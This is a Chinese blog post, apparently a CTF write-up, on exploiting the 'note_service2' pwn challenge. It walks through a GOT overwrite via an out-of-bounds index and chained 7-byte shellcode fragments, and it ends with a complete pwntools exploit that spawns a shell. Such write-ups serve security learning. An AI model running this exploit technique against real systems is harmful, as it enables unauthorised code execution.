<!DOCTYPE html><html lang="zh-CN" data-theme="light"><head><meta charset="UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width,initial-scale=1"><title>XCTF_note_service2 | Fl0ey</title><meta name="keywords" content="pwn"><meta name="author" content="Fl0ey"><meta name="copyright" content="Fl0ey"><meta name="format-detection" content="telephone=no"><meta name="theme-color" content="#ffffff"><meta http-equiv="Cache-Control" content="no-transform"><meta http-equiv="Cache-Control" content="no-siteapp"><meta name="description" content="分析过程：先查看保护机制，发现未开启NX，堆栈上可写  IDA分析，我们发现edit功能和show功能不可用，仅有delete和add功能 delete功能存在double free  add功能存在数组越界  再分析content_read函数可以发现我们申请size为8字节，实际上可写入字节为7个 具体解题思路:既然存在数组越界，那么我们考虑通过越界修改got表中的free函数  将free函">
<meta property="og:type" content="article">
<meta property="og:title" content="XCTF_note_service2">
<meta property="og:url" content="http://fl0ey.icu/2020/09/29/XCTF-note-service2/index.html">
<meta property="og:site_name" content="Fl0ey">
<meta property="og:description" content="分析过程：先查看保护机制，发现未开启NX，堆栈上可写  IDA分析，我们发现edit功能和show功能不可用，仅有delete和add功能 delete功能存在double free  add功能存在数组越界  再分析content_read函数可以发现我们申请size为8字节，实际上可写入字节为7个 具体解题思路:既然存在数组越界，那么我们考虑通过越界修改got表中的free函数  将free函">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/Moniy-Fish/Myimg@main/20201208171819.png">
<meta property="article:published_time" content="2020-09-29T14:23:36.000Z">
<meta property="article:modified_time" content="2020-12-12T12:30:53.994Z">
<meta property="article:author" content="Fl0ey">
<meta property="article:tag" content="pwn">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://cdn.jsdelivr.net/gh/Moniy-Fish/Myimg@main/20201208171819.png"><link rel="shortcut icon" href="/img/favicon.png"><link rel="canonical" href="http://fl0ey.icu/2020/09/29/XCTF-note-service2/"><link rel="preconnect" href="//cdn.jsdelivr.net"/><link rel="preconnect" href="//busuanzi.ibruce.info"/><link rel="stylesheet" href="/css/index.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free/css/all.min.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@latest/dist/jquery.fancybox.min.css"><script>var GLOBAL_CONFIG = { 
  root: '/',
  hexoversion: '5.2.0',
  algolia: undefined,
  localSearch: undefined,
  translate: undefined,
  noticeOutdate: undefined,
  highlight: {"plugin":"highlighjs","highlightCopy":true,"highlightLang":true},
  copy: {
    success: '复制成功',
    error: '复制错误',
    noSupport: '浏览器不支持'
  },
  relativeDate: {
    homepage: false,
    post: false
  },
  runtime: '',
  date_suffix: {
    just: '刚刚',
    min: '分钟前',
    hour: '小时前',
    day: '天前',
    month: '个月前'
  },
  copyright: undefined,
  ClickShowText: undefined,
  lightbox: 'fancybox',
  Snackbar: undefined,
  justifiedGallery: {
    js: 'https://cdn.jsdelivr.net/npm/justifiedGallery/dist/js/jquery.justifiedGallery.min.js',
    css: 'https://cdn.jsdelivr.net/npm/justifiedGallery/dist/css/justifiedGallery.min.css'
  },
  isPhotoFigcaption: false,
  islazyload: false,
  isanchor: false
};

var saveToLocal = {
  set: function setWithExpiry(key, value, ttl) {
    const now = new Date()
    const expiryDay = ttl * 86400000
    const item = {
      value: value,
      expiry: now.getTime() + expiryDay,
    }
    localStorage.setItem(key, JSON.stringify(item))
  },

  get: function getWithExpiry(key) {
    const itemStr = localStorage.getItem(key)

    if (!itemStr) {
      return undefined
    }
    const item = JSON.parse(itemStr)
    const now = new Date()

    if (now.getTime() > item.expiry) {
      localStorage.removeItem(key)
      return undefined
    }
    return item.value
  }
}</script><script id="config_change">var GLOBAL_CONFIG_SITE = { 
  isPost: true,
  isHome: false,
  isHighlightShrink: undefined,
  isSidebar: true,
  postUpdate: '2020-12-12 20:30:53'
}</script><noscript><style type="text/css">
  #nav {
    opacity: 1
  }
  .justified-gallery img {
    opacity: 1
  }

  #recent-posts time,
  #post-meta time {
    display: inline !important
  }
</style></noscript><script>(function () {
  window.activateDarkMode = function () {
    document.documentElement.setAttribute('data-theme', 'dark')
    if (document.querySelector('meta[name="theme-color"]') !== null) {
      document.querySelector('meta[name="theme-color"]').setAttribute('content', '#0d0d0d')
    }
  }
  window.activateLightMode = function () {
    document.documentElement.setAttribute('data-theme', 'light')
    if (document.querySelector('meta[name="theme-color"]') !== null) {
      document.querySelector('meta[name="theme-color"]').setAttribute('content', '#ffffff')
    }
  }

  const autoChangeMode = 'false'
  const t = saveToLocal.get('theme')
  if (autoChangeMode === '1') {
    const isDarkMode = window.matchMedia('(prefers-color-scheme: dark)').matches
    const isLightMode = window.matchMedia('(prefers-color-scheme: light)').matches
    const isNotSpecified = window.matchMedia('(prefers-color-scheme: no-preference)').matches
    const hasNoSupport = !isDarkMode && !isLightMode && !isNotSpecified

    if (t === undefined) {
      if (isLightMode) activateLightMode()
      else if (isDarkMode) activateDarkMode()
      else if (isNotSpecified || hasNoSupport) {
        const now = new Date()
        const hour = now.getHours()
        const isNight = hour <= 6 || hour >= 18
        isNight ? activateDarkMode() : activateLightMode()
      }
      window.matchMedia('(prefers-color-scheme: dark)').addListener(function (e) {
        if (saveToLocal.get('theme') === undefined) {
          e.matches ? activateDarkMode() : activateLightMode()
        }
      })
    } else if (t === 'light') activateLightMode()
    else activateDarkMode()
  } else if (autoChangeMode === '2') {
    const now = new Date()
    const hour = now.getHours()
    const isNight = hour <= 6 || hour >= 18
    if (t === undefined) isNight ? activateDarkMode() : activateLightMode()
    else if (t === 'light') activateLightMode()
    else activateDarkMode()
  } else {
    if (t === 'dark') activateDarkMode()
    else if (t === 'light') activateLightMode()
  }
})()</script><meta name="generator" content="Hexo 5.2.0"></head><body><div id="mobile-sidebar"><div id="menu_mask"></div><div id="mobile-sidebar-menus"><div class="mobile_author_icon"><img class="avatar-img" src="https://cdn.jsdelivr.net/gh/Moniy-Fish/Myimg@main/vn_pwn_simpleHeap92de66ab35ad1d659fae887a6e07e13d_1.jpg" onerror="onerror=null;src='/img/friend_404.gif'" alt="avatar"/></div><div class="mobile_post_data"><div class="mobile_data_item is-center"><div class="mobile_data_link"><a href="/archives/"><div class="headline">文章</div><div class="length_num">14</div></a></div></div><div class="mobile_data_item is-center">      <div class="mobile_data_link"><a href="/tags/"><div class="headline">标签</div><div class="length_num">3</div></a></div></div><div class="mobile_data_item is-center">     <div class="mobile_data_link"><a href="/categories/"><div class="headline">分类</div><div class="length_num">4</div></a></div></div></div><hr/><div class="menus_items"><div class="menus_item"><a class="site-page" href="/"><i class="fa-fw fas fa-home"></i><span> 主页</span></a></div><div class="menus_item"><a class="site-page" href="/archives/"><i class="fa-fw fas fa-archive"></i><span> 时间轴</span></a></div><div class="menus_item"><a class="site-page" href="/tags/"><i class="fa-fw fas fa-tags"></i><span> 标签</span></a></div><div class="menus_item"><a class="site-page" href="/categories/"><i class="fa-fw fas fa-folder-open"></i><span> 分类</span></a></div><div class="menus_item"><a class="site-page" href="/link/"><i class="fa-fw fas fa-link"></i><span> 友情链接</span></a></div></div></div></div><div id="body-wrap"><div id="web_bg"></div><div id="sidebar"><i class="fas fa-arrow-right on" id="toggle-sidebar"></i><div class="sidebar-toc"><div class="sidebar-toc__title">目录</div><div class="sidebar-toc__progress"><span class="progress-notice">你已经读了</span><span class="progress-num">0</span><span class="progress-percentage">%</span><div class="sidebar-toc__progress-bar">     </div></div><div class="sidebar-toc__content"><ol class="toc"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%88%86%E6%9E%90%E8%BF%87%E7%A8%8B%EF%BC%9A"><span class="toc-number">1.</span> <span class="toc-text">分析过程：</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%85%B7%E4%BD%93%E8%A7%A3%E9%A2%98%E6%80%9D%E8%B7%AF"><span class="toc-number">2.</span> <span class="toc-text">具体解题思路:</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%AE%8C%E6%95%B4exp"><span class="toc-number">3.</span> <span class="toc-text">完整exp:</span></a></li></ol></div></div></div><header class="post-bg" id="page-header" style="background-image: url(https://cdn.jsdelivr.net/gh/Moniy-Fish/Myimg@main/20201208171819.png)"><nav id="nav"><span id="blog_name"><a id="site-name" href="/">Fl0ey</a></span><span id="menus"><div class="menus_items"><div class="menus_item"><a class="site-page" href="/"><i class="fa-fw fas fa-home"></i><span> 主页</span></a></div><div class="menus_item"><a class="site-page" href="/archives/"><i class="fa-fw fas fa-archive"></i><span> 时间轴</span></a></div><div class="menus_item"><a class="site-page" href="/tags/"><i class="fa-fw fas fa-tags"></i><span> 标签</span></a></div><div class="menus_item"><a class="site-page" href="/categories/"><i class="fa-fw fas fa-folder-open"></i><span> 分类</span></a></div><div class="menus_item"><a class="site-page" href="/link/"><i class="fa-fw fas fa-link"></i><span> 友情链接</span></a></div></div><span class="close" id="toggle-menu"><a class="site-page"><i class="fas fa-bars fa-fw"></i></a></span></span></nav><div id="post-info"><div id="post-title"><div class="posttitle">XCTF_note_service2</div></div><div id="post-meta"><div class="meta-firstline"><span class="post-meta-date"><i class="far fa-calendar-alt fa-fw post-meta-icon"></i><span class="post-meta-label">发表于</span><time class="post-meta-date-created" datetime="2020-09-29T14:23:36.000Z" title="发表于 2020-09-29 22:23:36">2020-09-29</time><span class="post-meta-separator">|</span><i class="fas fa-history fa-fw post-meta-icon"></i><span class="post-meta-label">更新于</span><time class="post-meta-date-updated" datetime="2020-12-12T12:30:53.994Z" title="更新于 2020-12-12 20:30:53">2020-12-12</time></span><span class="post-meta-categories"><span class="post-meta-separator">|</span><i class="fas fa-inbox fa-fw post-meta-icon"></i><a class="post-meta-categories" href="/categories/write-up/">write_up</a></span></div><div class="meta-secondline"> <span class="post-meta-separator">|</span><span class="post-meta-pv-cv"><i class="far fa-eye fa-fw post-meta-icon"></i><span class="post-meta-label">阅读量:</span><span id="busuanzi_value_page_pv"></span></span></div></div></div></header><main class="layout_post" id="content-inner"><article id="post"><div class="post-content" id="article-container"><h3 id="分析过程："><a href="#分析过程：" class="headerlink" title="分析过程："></a>分析过程：</h3><p>先查看保护机制，发现未开启NX，堆栈上可写</p>
<p><img src="https://cdn.jsdelivr.net/gh/Moniy-Fish/Myimg@main/vn_pwn_simpleHeapimage-20200924194329462.png" alt="image-20200924194329462"></p>
<p>IDA分析，我们发现edit功能和show功能不可用，仅有delete和add功能</p>
<p>delete功能存在double free</p>
<p><img src="https://cdn.jsdelivr.net/gh/Moniy-Fish/Myimg@main/vn_pwn_simpleHeapimage-20200924194738836.png" alt="image-20200924194738836"></p>
<p>add功能存在数组越界</p>
<p><img src="https://cdn.jsdelivr.net/gh/Moniy-Fish/Myimg@main/vn_pwn_simpleHeapimage-20200924194945876.png"></p>
<p>再分析content_read函数可以发现我们申请size为8字节，实际上可写入字节为7个</p>
<h3 id="具体解题思路"><a href="#具体解题思路" class="headerlink" title="具体解题思路:"></a>具体解题思路:</h3><p>既然存在数组越界，那么我们考虑通过越界修改got表中的free函数</p>
<p><img src="https://cdn.jsdelivr.net/gh/Moniy-Fish/Myimg@main/vn_pwn_simpleHeapimage-20200924195439744.png"></p>
<p>将free函数的got表改为shellcode，从而get shell，而我们开的堆最多可写7个字节，没有7字节的shellcode，那么我们考虑通过申请多个堆来存放指令，利用jmp short指令跳转到下一段</p>
<p>jmp short指令:EB XX(十六进制代码)，XX=|jmp short指令当前地址-跳转地址|-指令所占的字节数字</p>
<p>那么我们可以构造payload：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#shellcode</span></span><br><span class="line"><span class="string">&#x27;&#x27;&#x27;</span></span><br><span class="line"><span class="string">mov rdi,xxx#/bin/sh</span></span><br><span class="line"><span class="string">mov rax,0x3b#execve的系统调用号</span></span><br><span class="line"><span class="string">mov rsi,0</span></span><br><span class="line"><span class="string">mov rdx,0</span></span><br><span class="line"><span class="string">syscall</span></span><br><span class="line"><span class="string">&#x27;&#x27;&#x27;</span></span><br><span class="line">add(<span class="number">0</span>,<span class="number">8</span>,<span class="string">&quot;/bin/sh&quot;</span>)</span><br><span class="line">add((free_got<span class="number">-0x2020a0</span>)/<span class="number">8</span>,<span class="number">8</span>,asm(<span class="string">&#x27;xor rax,rax&#x27;</span>)+<span class="string">&quot;\x90\x90\xEB\x19&quot;</span>)</span><br><span class="line">add(<span class="number">1</span>,<span class="number">8</span>,asm(<span class="string">&quot;mov eax,0x3b&quot;</span>)+<span class="string">&quot;\xeb\x19&quot;</span>)</span><br><span class="line">add(<span class="number">2</span>,<span class="number">8</span>,asm(<span class="string">&quot;xor rdx,rdx&quot;</span>)+<span class="string">&#x27;\x90\x90\xEB\x19&#x27;</span>)</span><br><span class="line">add(<span class="number">3</span>,<span class="number">8</span>,asm(<span class="string">&quot;xor rsi,rsi&quot;</span>)+<span class="string">&#x27;\x90\x90\xEB\x19&#x27;</span>)</span><br><span class="line">add(<span class="number">4</span>,<span class="number">8</span>,asm(<span class="string">&quot;syscall&quot;</span>).ljust(<span class="number">7</span>,<span class="string">&#x27;\x90&#x27;</span>))</span><br></pre></td></tr></table></figure>

<p>我们先把“/bin/sh”放入堆中，将free的got表写为汇编语句，因为需要rax、rdx、rdi均为0，所以我们通过xor操作将他们清零，因为第一个堆存放了”/bin/sh”，所以在调用free会将它存入rdi作为参数传入函数execve</p>
<p>\x90为nop指令</p>
<p>\xEB\x19计算过程:</p>
<p><img src="https://cdn.jsdelivr.net/gh/Moniy-Fish/Myimg@main/vn_pwn_simpleHeapimage-20200924203257236.png" alt="image-20200924203257236"></p>
<p>chunk0中jmp short指令在content_addr+5出，按照计算公式，我们要跳转到chunk1的content_addr处，即:</p>
<p>0x20-2+1，2为指令字节长度，1是因为每个content我们只能输入7个字节，最后一个字节为\x00，需要加上去，所以是<strong>0x19</strong></p>
<p>(free_got-0x2020a0)/8是因为64位存放地址是八个字节，(free_got-heap基地址)/8恰好就是free_got的地址</p>
<h3 id="完整exp"><a href="#完整exp" class="headerlink" title="完整exp:"></a>完整exp:</h3><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">context(os=<span class="string">&#x27;linux&#x27;</span>,arch=<span class="string">&#x27;amd64&#x27;</span>)</span><br><span class="line">r=process(<span class="string">&quot;./note_service2&quot;</span>)</span><br><span class="line"><span class="comment">#r=remote(&quot;220.249.52.133&quot;,56678)</span></span><br><span class="line">elf=ELF(<span class="string">&quot;./note_service2&quot;</span>)</span><br><span class="line">free_got=elf.got[<span class="string">&#x27;free&#x27;</span>]</span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">add</span>(<span class="params">idx,size,content</span>):</span></span><br><span class="line">	r.sendlineafter(<span class="string">&quot;your choice&gt;&gt;&quot;</span>,<span class="string">&quot;1&quot;</span>)</span><br><span class="line">	r.sendlineafter(<span class="string">&quot;index:&quot;</span>,str(idx))</span><br><span class="line">	r.sendlineafter(<span class="string">&quot;size:&quot;</span>,str(size))</span><br><span class="line">	r.sendlineafter(<span class="string">&quot;content:&quot;</span>,content)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">del_m</span>(<span class="params">idx</span>):</span></span><br><span class="line">	r.sendlineafter(<span class="string">&quot;your choice&gt;&gt;&quot;</span>,<span class="string">&quot;4&quot;</span>)</span><br><span class="line">	r.sendlineafter(<span class="string">&quot;index:&quot;</span>,str(idx))</span><br><span class="line"></span><br><span class="line">add(<span class="number">0</span>,<span class="number">8</span>,<span class="string">&quot;/bin/sh&quot;</span>)</span><br><span class="line">add((free_got<span class="number">-0x2020a0</span>)/<span class="number">8</span>,<span class="number">8</span>,asm(<span class="string">&#x27;xor rax,rax&#x27;</span>)+<span class="string">&quot;\x90\x90\xEB\x19&quot;</span>)</span><br><span class="line">add(<span class="number">1</span>,<span class="number">8</span>,asm(<span class="string">&quot;mov eax,0x3b&quot;</span>)+<span class="string">&quot;\xeb\x19&quot;</span>)</span><br><span class="line">add(<span class="number">2</span>,<span class="number">8</span>,asm(<span class="string">&quot;xor rdx,rdx&quot;</span>)+<span class="string">&#x27;\x90\x90\xEB\x19&#x27;</span>)</span><br><span class="line">add(<span class="number">3</span>,<span class="number">8</span>,asm(<span class="string">&quot;xor rsi,rsi&quot;</span>)+<span class="string">&#x27;\x90\x90\xEB\x19&#x27;</span>)</span><br><span class="line">add(<span class="number">4</span>,<span class="number">8</span>,asm(<span class="string">&quot;syscall&quot;</span>).ljust(<span class="number">7</span>,<span class="string">&#x27;\x90&#x27;</span>))</span><br><span class="line"><span class="comment">#gdb.attach(r)</span></span><br><span class="line"></span><br><span class="line">r.interactive()</span><br></pre></td></tr></table></figure>

</div><div class="post-copyright"><div class="post-copyright__author"><span class="post-copyright-meta">文章作者: </span><span class="post-copyright-info"><a href="mailto:undefined">Fl0ey</a></span></div><div class="post-copyright__type"><span class="post-copyright-meta">文章链接: </span><span class="post-copyright-info"><a href="http://fl0ey.icu/2020/09/29/XCTF-note-service2/">http://fl0ey.icu/2020/09/29/XCTF-note-service2/</a></span></div><div class="post-copyright__notice"><span class="post-copyright-meta">版权声明: </span><span class="post-copyright-info">本博客所有文章除特别声明外，均采用 <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/" target="_blank">CC BY-NC-SA 4.0</a> 许可协议。转载请注明来自 <a href="http://fl0ey.icu" target="_blank">Fl0ey</a>！</span></div></div><div class="tag_share"><div class="post-meta__tag-list"><a class="post-meta__tags" href="/tags/pwn/">pwn</a></div><div class="post_share"><div class="social-share" data-image="https://cdn.jsdelivr.net/gh/Moniy-Fish/Myimg@main/20201208171819.png" data-sites="facebook,twitter,wechat,weibo,qq"></div><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/social-share.js/dist/css/share.min.css"><script src="https://cdn.jsdelivr.net/npm/social-share.js/dist/js/social-share.min.js" defer></script></div></div><nav class="pagination-post" id="pagination"><div class="prev-post pull-left"><a href="/2020/10/10/babyheap_0ctf_2017/"><img class="prev-cover" src="https://cdn.jsdelivr.net/gh/Moniy-Fish/Myimg@main/20201208170833.png" onerror="onerror=null;src='/img/404.jpg'"><div class="pagination-info"><div class="label">上一篇</div><div class="prev_info">babyheap_0ctf_2017</div></div></a></div><div class="next-post pull-right"><a href="/2020/09/29/%E7%BE%8A%E5%9F%8E%E6%9D%AFbabypwn/"><img class="next-cover" src="https://cdn.jsdelivr.net/gh/Moniy-Fish/Myimg@main/20201208171922.png" onerror="onerror=null;src='/img/404.jpg'"><div class="pagination-info"><div class="label">下一篇</div><div class="next_info">羊城杯babypwn</div></div></a></div></nav><div class="relatedPosts"><div class="headline"><i class="fas fa-thumbs-up fa-fw"></i><span> 相关推荐</span></div><div class="relatedPosts-list"><div><a href="/2020/09/29/vn_pwn_simpleHeap/" title="vn_pwn_simpleHeap"><img class="cover" src="https://cdn.jsdelivr.net/gh/Moniy-Fish/Myimg@main/20201208190939.png"><div class="content is-center"><div class="date"><i class="far fa-calendar-alt fa-fw"></i> 2020-09-29</div><div class="title">vn_pwn_simpleHeap</div></div></a></div><div><a href="/2020/09/29/羊城杯babypwn/" title="羊城杯babypwn"><img class="cover" src="https://cdn.jsdelivr.net/gh/Moniy-Fish/Myimg@main/20201208171922.png"><div class="content is-center"><div class="date"><i class="far fa-calendar-alt fa-fw"></i> 2020-09-29</div><div class="title">羊城杯babypwn</div></div></a></div><div><a href="/2020/10/10/babyheap_0ctf_2017/" title="babyheap_0ctf_2017"><img class="cover" src="https://cdn.jsdelivr.net/gh/Moniy-Fish/Myimg@main/20201208170833.png"><div class="content is-center"><div class="date"><i class="far fa-calendar-alt fa-fw"></i> 2020-10-10</div><div class="title">babyheap_0ctf_2017</div></div></a></div><div><a href="/2020/10/15/house_of_orange/" title="House_of_Orange"><img class="cover" src="https://cdn.jsdelivr.net/gh/Moniy-Fish/Myimg@main/20201208165230.png"><div class="content is-center"><div class="date"><i class="far fa-calendar-alt fa-fw"></i> 2020-10-15</div><div class="title">House_of_Orange</div></div></a></div><div><a href="/2020/11/04/free思路/" title="glibc-2.31下double free思路"><img class="cover" src="https://cdn.jsdelivr.net/gh/Moniy-Fish/Myimg@main/20201208164650.png"><div class="content is-center"><div class="date"><i class="far fa-calendar-alt fa-fw"></i> 2020-11-04</div><div class="title">glibc-2.31下double free思路</div></div></a></div><div><a href="/2020/11/12/铁三pwnWriteup/" title="铁人三项线上赛pwn题"><img class="cover" src="https://cdn.jsdelivr.net/gh/Moniy-Fish/Myimg@main/20201208164539.png"><div class="content is-center"><div class="date"><i class="far fa-calendar-alt fa-fw"></i> 2020-11-12</div><div class="title">铁人三项线上赛pwn题</div></div></a></div></div></div></article></main><footer id="footer" style="background-image: url(https://cdn.jsdelivr.net/gh/Moniy-Fish/Myimg@main/20201208171819.png)"><div id="footer-wrap"><div class="copyright">&copy;2020 By Fl0ey</div><div class="framework-info"><span>框架 </span><a target="_blank" rel="noopener" href="https://hexo.io">Hexo</a><span class="footer-separator">|</span><span>主题 </span><a target="_blank" rel="noopener" href="https://github.com/jerryc127/hexo-theme-butterfly">Butterfly</a></div></div></footer></div><section id="rightside"><div id="rightside-config-hide"><button id="readmode" type="button" title="阅读模式"><i class="fas fa-book-open"></i></button><button id="darkmode" type="button" title="浅色和深色模式转换"><i class="fas fa-adjust"></i></button></div><div id="rightside-config-show"><button id="rightside_config" type="button" title="设置"><i class="fas fa-cog"></i></button><button class="close" id="mobile-toc-button" type="button" title="目录"><i class="fas fa-list-ul"></i></button><button id="go-up" type="button" title="回到顶部"><i class="fas fa-arrow-up"></i></button></div></section><div><script src="https://cdn.jsdelivr.net/npm/jquery@latest/dist/jquery.min.js"></script><script src="/js/utils.js"></script><script src="/js/main.js"></script><script src="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@latest/dist/jquery.fancybox.min.js"></script><div class="js-pjax"><script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script></div><script id="canvas_nest" defer="defer" color="0,0,255" opacity="0.7" zIndex="-1" count="99" mobile="false" src="https://cdn.jsdelivr.net/npm/butterfly-extsrc@1/dist/canvas-nest.min.js"></script></div></body></html>